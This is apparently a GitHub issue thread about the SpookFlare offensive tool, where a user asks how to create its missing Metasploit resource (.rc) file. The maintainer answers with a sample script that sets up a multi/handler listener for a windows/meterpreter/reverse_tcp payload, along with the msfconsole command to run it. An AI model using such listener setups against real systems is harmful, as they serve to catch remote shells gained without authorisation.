hlldz/SpookFlare

Problem With SpookFlare.rc

Daavide opened this issue · 3 comments

Hello and congratulation for the great tool.
Im encountering a problem while operating with the tool.
Following the instructional video i'm not able to find the SpookFlare.rc file
spookflare_problem

Here also what i have in the folder
spookflare_problem2

in the end, im having this error:
spookflare_problem3

Is there a way to fix this ? I'll be waiting for an answer, thanks again!

pip install editorconfig

That will get rid of the last error. The RC file you need to build by hand.

Hi again geekspeed.
I'm sorry but im not able to generate the spookflare.rc file.
Can you please gently provide me a sample so i can understand better ?
Thanks!

hlldz commented

In short, RC files are files that contain the commands to run in Metasploit. Once you open Metasploit, Metasploit can read the commands from the file and process them quickly.

For example, I want to start listen mode for meterpreter/reverse_tcp payload and I can write the commands in a file and run Metasploit as follows.

file.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1
exploit -j -z

Metasploit start command
msfconsole -r file.rc

I would suggest you read the following content.
https://metasploit.help.rapid7.com/docs/resource-scripts